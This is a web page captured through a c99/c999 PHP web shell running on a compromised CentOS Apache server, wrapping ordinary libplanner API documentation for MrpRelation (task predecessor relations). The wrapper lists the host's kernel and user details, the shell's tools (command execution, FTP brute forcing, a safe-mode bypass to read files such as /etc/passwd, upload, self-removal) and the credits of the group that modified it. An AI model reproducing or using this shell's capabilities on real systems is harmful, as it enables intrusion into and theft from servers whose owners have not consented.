!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/gtk-doc/html/libplanner/   drwxr-xr-x
Free 35.31 GB of 127.8 GB (27.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     libplanner-MrpRelation.html (9.72 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
MrpRelation

MrpRelation

MrpRelation — represents a task predecessor relation in the project.

Description

A predecessor relation is used to affect the scheduling of a task relative another task. A relation may have a lag time associated to it, so that a task can be scheduled to start after another task has finished, plus a lag time.

Details

MrpRelationPriv

typedef struct _MrpRelationPriv MrpRelationPriv;

A private struct for internal use only. The definition of this structure is not publically available.


MrpRelation

typedef struct {
	MrpObject        parent;
	MrpRelationPriv *priv;
} MrpRelation;

Object representing a predecessor relation between two tasks.


enum MrpRelationType

typedef enum {
	MRP_RELATION_NONE = 0, /* unset */
	MRP_RELATION_FS,       /* finish-to-start */
	MRP_RELATION_FF,       /* finish-to-finish */
	MRP_RELATION_SS,       /* start-to-start */
	MRP_RELATION_SF        /* start-to-finish */
} MrpRelationType;

The type of relation.

MRP_RELATION_NONE invalid relation type (unset)
MRP_RELATION_FS finish to start
MRP_RELATION_FF finish to finish (unimplemented)
MRP_RELATION_SS start to start (unimplemented)
MRP_RELATION_SF start to finish (unimplemented)

mrp_relation_get_predecessor ()

MrpTask*    mrp_relation_get_predecessor    (MrpRelation *relation);

Retrieves the predecessor of relation.

relation : an MrpRelation
Returns : the predecessor task.

mrp_relation_get_successor ()

MrpTask*    mrp_relation_get_successor      (MrpRelation *relation);

Retrieves the successor of relation.

relation : an MrpRelation
Returns : the successor task.

mrp_relation_get_lag ()

gint        mrp_relation_get_lag            (MrpRelation *relation);

Retrieves the lag between the predecessor and successor in relation.

relation : an MrpRelation
Returns : Lag time in seconds.

mrp_relation_get_relation_type ()

MrpRelationType mrp_relation_get_relation_type
                                            (MrpRelation *relation);

Retrieves the relation type of relation.

relation : an MrpRelation
Returns : the MrpRelationType of the relation.

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--